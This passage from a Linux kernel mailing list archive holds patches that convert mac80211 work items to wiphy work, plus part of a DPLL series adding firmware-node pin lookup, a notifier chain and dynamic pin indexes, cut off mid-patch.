a/net/mac80211/mlme.c b/net/mac80211/mlme.c index 1fb41e5cc577..8824460a2060 100644 --- a/net/mac80211/mlme.c +++ b/net/mac80211/mlme.c @@ -3168,7 +3168,7 @@ void ieee80211_sta_tx_notify(struct ieee80211_sub_if_data *sdata, sdata->u.mgd.probe_send_count = 0; else sdata->u.mgd.nullfunc_failed = true; - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } static void ieee80211_mlme_send_probe_req(struct ieee80211_sub_if_data *sdata, @@ -6031,7 +6031,7 @@ static void ieee80211_sta_timer(struct timer_list *t) struct ieee80211_sub_if_data *sdata = from_timer(sdata, t, u.mgd.timer); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } void ieee80211_sta_connection_lost(struct ieee80211_sub_if_data *sdata, @@ -6175,7 +6175,7 @@ void ieee80211_mgd_conn_tx_status(struct ieee80211_sub_if_data *sdata, sdata->u.mgd.status_acked = acked; sdata->u.mgd.status_received = true; - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } void 
ieee80211_sta_work(struct ieee80211_sub_if_data *sdata) diff --git a/net/mac80211/ocb.c b/net/mac80211/ocb.c index a57dcbe99a0d..fcc326913391 100644 --- a/net/mac80211/ocb.c +++ b/net/mac80211/ocb.c @@ -81,7 +81,7 @@ void ieee80211_ocb_rx_no_sta(struct ieee80211_sub_if_data *sdata, spin_lock(&ifocb->incomplete_lock); list_add(&sta->list, &ifocb->incomplete_stations); spin_unlock(&ifocb->incomplete_lock); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } static struct sta_info *ieee80211_ocb_finish_sta(struct sta_info *sta) @@ -157,7 +157,7 @@ static void ieee80211_ocb_housekeeping_timer(struct timer_list *t) set_bit(OCB_WORK_HOUSEKEEPING, &ifocb->wrkq_flags); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } void ieee80211_ocb_setup_sdata(struct ieee80211_sub_if_data *sdata) @@ -197,7 +197,7 @@ int ieee80211_ocb_join(struct ieee80211_sub_if_data *sdata, ifocb->joined = true; set_bit(OCB_WORK_HOUSEKEEPING, &ifocb->wrkq_flags); - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); netif_carrier_on(sdata->dev); return 0; diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c index 42dd7d1dda39..a6636e9f5c08 100644 --- a/net/mac80211/rx.c +++ b/net/mac80211/rx.c @@ -229,7 +229,7 @@ static void __ieee80211_queue_skb_to_iface(struct ieee80211_sub_if_data *sdata, } skb_queue_tail(&sdata->skb_queue, skb); - ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); if (sta) sta->deflink.rx_stats.packets++; } diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c index f1147d156c1f..58da59836884 100644 --- a/net/mac80211/scan.c +++ b/net/mac80211/scan.c @@ -503,7 +503,7 @@ static void __ieee80211_scan_completed(struct ieee80211_hw *hw, bool aborted) */ list_for_each_entry_rcu(sdata, &local->interfaces, list) { if (ieee80211_sdata_running(sdata)) - 
ieee80211_queue_work(&sdata->local->hw, &sdata->work); + wiphy_work_queue(sdata->local->hw.wiphy, &sdata->work); } if (was_scanning) diff --git a/net/mac80211/status.c b/net/mac80211/status.c index 3a96aa306616..9a8fca897d9f 100644 --- a/net/mac80211/status.c +++ b/net/mac80211/status.c @@ -5,7 +5,7 @@ * Copyright 2006-2007 Jiri Benc <jbenc@suse.cz> * Copyright 2008-2010 Johannes Berg <johannes@sipsolutions.net> * Copyright 2013-2014 Intel Mobile Communications GmbH - * Copyright 2021-2022 Intel Corporation + * Copyright 2021-2023 Intel Corporation */ #include <linux/export.h> @@ -747,8 +747,8 @@ static void ieee80211_report_used_skb(struct ieee80211_local *local, if (qskb) { skb_queue_tail(&sdata->status_queue, qskb); - ieee80211_queue_work(&local->hw, - &sdata->work); + wiphy_work_queue(local->hw.wiphy, + &sdata->work); } } } else { diff --git a/net/mac80211/util.c b/net/mac80211/util.c index e60c8607e4b6..116a3e70582b 100644 --- a/net/mac80211/util.c +++ b/net/mac80211/util.c @@ -2751,7 +2751,7 @@ int ieee80211_reconfig(struct ieee80211_local *local) /* Requeue all works */ list_for_each_entry(sdata, &local->interfaces, list) - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } ieee80211_wake_queues_by_reason(hw, IEEE80211_MAX_QUEUE_MAP, -- 2.53.0.rc2.2.g2258446484
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit 777b26002b73127e81643d9286fadf3d41e0e477 ] Again, to have the wiphy locked for it. Reviewed-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com> Signed-off-by: Johannes Berg <johannes.berg@intel.com> [ Summary of conflict resolutions: - In mlme.c, move only tdls_peer_del_work to wiphy work, and none of the other works ] Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- net/mac80211/ieee80211_i.h | 4 ++-- net/mac80211/mlme.c | 7 ++++--- net/mac80211/tdls.c | 11 ++++++----- 3 files changed, 12 insertions(+), 10 deletions(-) diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index 6cc5bba2ba52..e94a370da4c4 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -531,7 +531,7 @@ struct ieee80211_if_managed { /* TDLS support */ u8 tdls_peer[ETH_ALEN] __aligned(2); - struct delayed_work tdls_peer_del_work; + struct wiphy_delayed_work tdls_peer_del_work; struct sk_buff *orig_teardown_skb; /* The original teardown skb */ struct sk_buff *teardown_skb; /* A copy to send through the AP */ spinlock_t teardown_lock; /* To lock changing teardown_skb */ @@ -2525,7 +2525,7 @@ int ieee80211_tdls_mgmt(struct wiphy *wiphy, struct net_device *dev, size_t extra_ies_len); int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, const u8 *peer, enum nl80211_tdls_operation oper); -void ieee80211_tdls_peer_del_work(struct work_struct *wk); +void ieee80211_tdls_peer_del_work(struct wiphy *wiphy, struct wiphy_work *wk); int ieee80211_tdls_channel_switch(struct wiphy *wiphy, struct net_device *dev, const u8 *addr, u8 oper_class, struct cfg80211_chan_def *chandef); diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c index 8824460a2060..30db27df6b79 100644 --- a/net/mac80211/mlme.c +++ b/net/mac80211/mlme.c @@ -6517,8 +6517,8 @@ void ieee80211_sta_setup_sdata(struct ieee80211_sub_if_data *sdata) ieee80211_beacon_connection_loss_work);
INIT_WORK(&ifmgd->csa_connection_drop_work, ieee80211_csa_connection_drop_work); - INIT_DELAYED_WORK(&ifmgd->tdls_peer_del_work, - ieee80211_tdls_peer_del_work); + wiphy_delayed_work_init(&ifmgd->tdls_peer_del_work, + ieee80211_tdls_peer_del_work); timer_setup(&ifmgd->timer, ieee80211_sta_timer, 0); timer_setup(&ifmgd->bcn_mon_timer, ieee80211_sta_bcn_mon_timer, 0); timer_setup(&ifmgd->conn_mon_timer, ieee80211_sta_conn_mon_timer, 0); @@ -7524,7 +7524,8 @@ void ieee80211_mgd_stop(struct ieee80211_sub_if_data *sdata) cancel_work_sync(&ifmgd->monitor_work); cancel_work_sync(&ifmgd->beacon_connection_loss_work); cancel_work_sync(&ifmgd->csa_connection_drop_work); - cancel_delayed_work_sync(&ifmgd->tdls_peer_del_work); + wiphy_delayed_work_cancel(sdata->local->hw.wiphy, + &ifmgd->tdls_peer_del_work); sdata_lock(sdata); if (ifmgd->assoc_data) diff --git a/net/mac80211/tdls.c b/net/mac80211/tdls.c index 04531d18fa93..1f07b598a6a1 100644 --- a/net/mac80211/tdls.c +++ b/net/mac80211/tdls.c @@ -21,7 +21,7 @@ /* give usermode some time for retries in setting up the TDLS session */ #define TDLS_PEER_SETUP_TIMEOUT (15 * HZ) -void ieee80211_tdls_peer_del_work(struct work_struct *wk) +void ieee80211_tdls_peer_del_work(struct wiphy *wiphy, struct wiphy_work *wk) { struct ieee80211_sub_if_data *sdata; struct ieee80211_local *local; @@ -1128,9 +1128,9 @@ ieee80211_tdls_mgmt_setup(struct wiphy *wiphy, struct net_device *dev, return ret; } - ieee80211_queue_delayed_work(&sdata->local->hw, - &sdata->u.mgd.tdls_peer_del_work, - TDLS_PEER_SETUP_TIMEOUT); + wiphy_delayed_work_queue(sdata->local->hw.wiphy, + &sdata->u.mgd.tdls_peer_del_work, + TDLS_PEER_SETUP_TIMEOUT); return 0; out_unlock: @@ -1427,7 +1427,8 @@ int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, } if (ret == 0 && ether_addr_equal(sdata->u.mgd.tdls_peer, peer)) { - cancel_delayed_work(&sdata->u.mgd.tdls_peer_del_work); + wiphy_delayed_work_cancel(sdata->local->hw.wiphy, + 
&sdata->u.mgd.tdls_peer_del_work); eth_zero_addr(sdata->u.mgd.tdls_peer); } -- 2.53.0.rc2.2.g2258446484
{ "author": "Hanne-Lotta Mäenpää <hannelotta@gmail.com>", "date": "Mon, 2 Feb 2026 18:49:24 +0200", "thread_id": "20260202164924.215621-2-hannelotta@gmail.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. 
Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Extend the DPLL core to support associating a DPLL pin with a firmware node. This association is required to allow other subsystems (such as network drivers) to locate and request specific DPLL pins defined in the Device Tree or ACPI. * Add a .fwnode field to the struct dpll_pin * Introduce dpll_pin_fwnode_set() helper to allow the provider driver to associate a pin with a fwnode after the pin has been allocated * Introduce fwnode_dpll_pin_find() helper to allow consumers to search for a registered DPLL pin using its associated fwnode handle * Ensure the fwnode reference is properly released in dpll_pin_put() Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * fixed fwnode_dpll_pin_find() return value description --- drivers/dpll/dpll_core.c | 49 ++++++++++++++++++++++++++++++++++++++++ drivers/dpll/dpll_core.h | 2 ++ include/linux/dpll.h | 11 +++++++++ 3 files changed, 62 insertions(+) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 8879a72351561..f04ed7195cadd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -10,6 +10,7 @@ #include <linux/device.h> #include <linux/err.h> +#include <linux/property.h> #include <linux/slab.h> #include <linux/string.h> @@ -595,12 +596,60 @@ void dpll_pin_put(struct dpll_pin *pin) xa_destroy(&pin->parent_refs); xa_destroy(&pin->ref_sync_pins); dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); kfree_rcu(pin, rcu); } mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); +/** + * dpll_pin_fwnode_set - set dpll pin firmware node reference + * @pin: pointer to a dpll pin + * @fwnode: firmware node handle + * + * Set firmware node handle for the given dpll pin. 
+ */ +void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode) +{ + mutex_lock(&dpll_lock); + fwnode_handle_put(pin->fwnode); /* Drop fwnode previously set */ + pin->fwnode = fwnode_handle_get(fwnode); + mutex_unlock(&dpll_lock); +} +EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); + +/** + * fwnode_dpll_pin_find - find dpll pin by firmware node reference + * @fwnode: reference to firmware node + * + * Get existing object of a pin that is associated with given firmware node + * reference. + * + * Context: Acquires a lock (dpll_lock) + * Return: + * * valid dpll_pin pointer on success + * * NULL when no such pin exists + */ +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +{ + struct dpll_pin *pin, *ret = NULL; + unsigned long index; + + mutex_lock(&dpll_lock); + xa_for_each(&dpll_pin_xa, index, pin) { + if (pin->fwnode == fwnode) { + ret = pin; + refcount_inc(&ret->refcount); + break; + } + } + mutex_unlock(&dpll_lock); + + return ret; +} +EXPORT_SYMBOL_GPL(fwnode_dpll_pin_find); + static int __dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv, void *cookie) diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index 8ce969bbeb64e..d3e17ff0ecef0 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -42,6 +42,7 @@ struct dpll_device { * @pin_idx: index of a pin given by dev driver * @clock_id: clock_id of creator * @module: module of creator + * @fwnode: optional reference to firmware node * @dpll_refs: hold referencees to dplls pin was registered with * @parent_refs: hold references to parent pins pin was registered with * @ref_sync_pins: hold references to pins for Reference SYNC feature @@ -54,6 +55,7 @@ struct dpll_pin { u32 pin_idx; u64 clock_id; struct module *module; + struct fwnode_handle *fwnode; struct xarray dpll_refs; struct xarray parent_refs; struct xarray ref_sync_pins; diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 
c6d0248fa5273..f2e8660e90cdf 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -16,6 +16,7 @@ struct dpll_device; struct dpll_pin; struct dpll_pin_esync; +struct fwnode_handle; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -178,6 +179,8 @@ void dpll_netdev_pin_clear(struct net_device *dev); size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); + +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -193,6 +196,12 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) { return 0; } + +static inline struct dpll_pin * +fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +{ + return NULL; +} #endif struct dpll_device * @@ -218,6 +227,8 @@ void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); + int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:30 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
Associate the registered DPLL pin with its firmware node by calling dpll_pin_fwnode_set(). This links the created pin object to its corresponding DT/ACPI node in the DPLL core. Consequently, this enables consumer drivers (such as network drivers) to locate and request this specific pin using the fwnode_dpll_pin_find() helper. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 7d8ed948b9706..9eed21088adac 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1485,6 +1485,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; } + dpll_pin_fwnode_set(pin->dpll_pin, props->fwnode); if (zl3073x_dpll_is_input_pin(pin)) ops = &zl3073x_dpll_input_pin_ops; -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:31 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
From: Petr Oros <poros@redhat.com> Currently, the DPLL subsystem reports events (creation, deletion, changes) to userspace via Netlink. However, there is no mechanism for other kernel components to be notified of these events directly. Add a raw notifier chain to the DPLL core protected by dpll_lock. This allows other kernel subsystems or drivers to register callbacks and receive notifications when DPLL devices or pins are created, deleted, or modified. Define the following: - Registration helpers: {,un}register_dpll_notifier() - Event types: DPLL_DEVICE_CREATED, DPLL_PIN_CREATED, etc. - Context structures: dpll_{device,pin}_notifier_info to pass relevant data to the listeners. The notification chain is invoked alongside the existing Netlink event generation to ensure in-kernel listeners are kept in sync with the subsystem state. Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev> Co-developed-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> --- drivers/dpll/dpll_core.c | 57 +++++++++++++++++++++++++++++++++++++ drivers/dpll/dpll_core.h | 4 +++ drivers/dpll/dpll_netlink.c | 6 ++++ include/linux/dpll.h | 29 +++++++++++++++++++ 4 files changed, 96 insertions(+) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f04ed7195cadd..b05fe2ba46d91 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -23,6 +23,8 @@ DEFINE_MUTEX(dpll_lock); DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC); DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC); +static RAW_NOTIFIER_HEAD(dpll_notifier_chain); + static u32 dpll_device_xa_id; static u32 dpll_pin_xa_id; @@ -46,6 +48,39 @@ struct dpll_pin_registration { void *cookie; }; +static int call_dpll_notifiers(unsigned long action, void *info) +{ + lockdep_assert_held(&dpll_lock); + return raw_notifier_call_chain(&dpll_notifier_chain, action, info); +} + +void dpll_device_notify(struct dpll_device *dpll, unsigned long 
action) +{ + struct dpll_device_notifier_info info = { + .dpll = dpll, + .id = dpll->id, + .idx = dpll->device_idx, + .clock_id = dpll->clock_id, + .type = dpll->type, + }; + + call_dpll_notifiers(action, &info); +} + +void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) +{ + struct dpll_pin_notifier_info info = { + .pin = pin, + .id = pin->id, + .idx = pin->pin_idx, + .clock_id = pin->clock_id, + .fwnode = pin->fwnode, + .prop = &pin->prop, + }; + + call_dpll_notifiers(action, &info); +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -539,6 +574,28 @@ void dpll_netdev_pin_clear(struct net_device *dev) } EXPORT_SYMBOL(dpll_netdev_pin_clear); +int register_dpll_notifier(struct notifier_block *nb) +{ + int ret; + + mutex_lock(&dpll_lock); + ret = raw_notifier_chain_register(&dpll_notifier_chain, nb); + mutex_unlock(&dpll_lock); + return ret; +} +EXPORT_SYMBOL_GPL(register_dpll_notifier); + +int unregister_dpll_notifier(struct notifier_block *nb) +{ + int ret; + + mutex_lock(&dpll_lock); + ret = raw_notifier_chain_unregister(&dpll_notifier_chain, nb); + mutex_unlock(&dpll_lock); + return ret; +} +EXPORT_SYMBOL_GPL(unregister_dpll_notifier); + /** * dpll_pin_get - find existing or create new dpll pin * @clock_id: clock_id of creator diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index d3e17ff0ecef0..b7b4bb251f739 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -91,4 +91,8 @@ struct dpll_pin_ref *dpll_xa_ref_dpll_first(struct xarray *xa_refs); extern struct xarray dpll_device_xa; extern struct xarray dpll_pin_xa; extern struct mutex dpll_lock; + +void dpll_device_notify(struct dpll_device *dpll, unsigned long action); +void dpll_pin_notify(struct dpll_pin *pin, unsigned long action); + #endif diff --git a/drivers/dpll/dpll_netlink.c b/drivers/dpll/dpll_netlink.c index 904199ddd1781..83cbd64abf5a4 100644 --- a/drivers/dpll/dpll_netlink.c +++ 
b/drivers/dpll/dpll_netlink.c @@ -761,17 +761,20 @@ dpll_device_event_send(enum dpll_cmd event, struct dpll_device *dpll) int dpll_device_create_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_CREATED); return dpll_device_event_send(DPLL_CMD_DEVICE_CREATE_NTF, dpll); } int dpll_device_delete_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_DELETED); return dpll_device_event_send(DPLL_CMD_DEVICE_DELETE_NTF, dpll); } static int __dpll_device_change_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_CHANGED); return dpll_device_event_send(DPLL_CMD_DEVICE_CHANGE_NTF, dpll); } @@ -829,16 +832,19 @@ dpll_pin_event_send(enum dpll_cmd event, struct dpll_pin *pin) int dpll_pin_create_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_CREATED); return dpll_pin_event_send(DPLL_CMD_PIN_CREATE_NTF, pin); } int dpll_pin_delete_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_DELETED); return dpll_pin_event_send(DPLL_CMD_PIN_DELETE_NTF, pin); } int __dpll_pin_change_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_CHANGED); return dpll_pin_event_send(DPLL_CMD_PIN_CHANGE_NTF, pin); } diff --git a/include/linux/dpll.h b/include/linux/dpll.h index f2e8660e90cdf..8ed90dfc65f05 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -11,6 +11,7 @@ #include <linux/device.h> #include <linux/netlink.h> #include <linux/netdevice.h> +#include <linux/notifier.h> #include <linux/rtnetlink.h> struct dpll_device; @@ -172,6 +173,30 @@ struct dpll_pin_properties { u32 phase_gran; }; +#define DPLL_DEVICE_CREATED 1 +#define DPLL_DEVICE_DELETED 2 +#define DPLL_DEVICE_CHANGED 3 +#define DPLL_PIN_CREATED 4 +#define DPLL_PIN_DELETED 5 +#define DPLL_PIN_CHANGED 6 + +struct dpll_device_notifier_info { + struct dpll_device *dpll; + u32 id; + u32 idx; + u64 clock_id; + enum dpll_type type; +}; + +struct dpll_pin_notifier_info { + struct dpll_pin *pin; + u32 id; + u32 idx; + u64 clock_id; + const struct 
fwnode_handle *fwnode; + const struct dpll_pin_properties *prop; +}; + #if IS_ENABLED(CONFIG_DPLL) void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin); void dpll_netdev_pin_clear(struct net_device *dev); @@ -242,4 +267,8 @@ int dpll_device_change_ntf(struct dpll_device *dpll); int dpll_pin_change_ntf(struct dpll_pin *pin); +int register_dpll_notifier(struct notifier_block *nb); + +int unregister_dpll_notifier(struct notifier_block *nb); + #endif -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:32 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
Allow drivers to register DPLL pins without manually specifying a pin index. Currently, drivers must provide a unique pin index when calling dpll_pin_get(). This works well for hardware-mapped pins but creates friction for drivers handling virtual pins or those without a strict hardware indexing scheme. Introduce DPLL_PIN_IDX_UNSPEC (U32_MAX). When a driver passes this value as the pin index: 1. The core allocates a unique index using an IDA 2. The allocated index is mapped to a range starting above `INT_MAX` This separation ensures that dynamically allocated indices never collide with standard driver-provided hardware indices, which are assumed to be within the `0` to `INT_MAX` range. The index is automatically freed when the pin is released in dpll_pin_put(). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v2: * fixed integer overflow in dpll_pin_idx_free() --- drivers/dpll/dpll_core.c | 48 ++++++++++++++++++++++++++++++++++++++-- include/linux/dpll.h | 2 ++ 2 files changed, 48 insertions(+), 2 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index b05fe2ba46d91..59081cf2c73ae 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -10,6 +10,7 @@ #include <linux/device.h> #include <linux/err.h> +#include <linux/idr.h> #include <linux/property.h> #include <linux/slab.h> #include <linux/string.h> @@ -24,6 +25,7 @@ DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC); DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC); static RAW_NOTIFIER_HEAD(dpll_notifier_chain); +static DEFINE_IDA(dpll_pin_idx_ida); static u32 dpll_device_xa_id; static u32 dpll_pin_xa_id; @@ -464,6 +466,36 @@ void dpll_device_unregister(struct dpll_device *dpll, } EXPORT_SYMBOL_GPL(dpll_device_unregister); +static int dpll_pin_idx_alloc(u32 *pin_idx) +{ + int ret; + + if (!pin_idx) + return -EINVAL; + + /* Alloc unique number from IDA. 
Number belongs to <0, INT_MAX> range */ + ret = ida_alloc(&dpll_pin_idx_ida, GFP_KERNEL); + if (ret < 0) + return ret; + + /* Map the value to dynamic pin index range <INT_MAX+1, U32_MAX> */ + *pin_idx = (u32)ret + INT_MAX + 1; + + return 0; +} + +static void dpll_pin_idx_free(u32 pin_idx) +{ + if (pin_idx <= INT_MAX) + return; /* Not a dynamic pin index */ + + /* Map the index value from dynamic pin index range to IDA range and + * free it. + */ + pin_idx -= (u32)INT_MAX + 1; + ida_free(&dpll_pin_idx_ida, pin_idx); +} + static void dpll_pin_prop_free(struct dpll_pin_properties *prop) { kfree(prop->package_label); @@ -521,9 +553,18 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, struct dpll_pin *pin; int ret; + if (pin_idx == DPLL_PIN_IDX_UNSPEC) { + ret = dpll_pin_idx_alloc(&pin_idx); + if (ret) + return ERR_PTR(ret); + } else if (pin_idx > INT_MAX) { + return ERR_PTR(-EINVAL); + } pin = kzalloc(sizeof(*pin), GFP_KERNEL); - if (!pin) - return ERR_PTR(-ENOMEM); + if (!pin) { + ret = -ENOMEM; + goto err_pin_alloc; + } pin->pin_idx = pin_idx; pin->clock_id = clock_id; pin->module = module; @@ -551,6 +592,8 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, dpll_pin_prop_free(&pin->prop); err_pin_prop: kfree(pin); +err_pin_alloc: + dpll_pin_idx_free(pin_idx); return ERR_PTR(ret); } @@ -654,6 +697,7 @@ void dpll_pin_put(struct dpll_pin 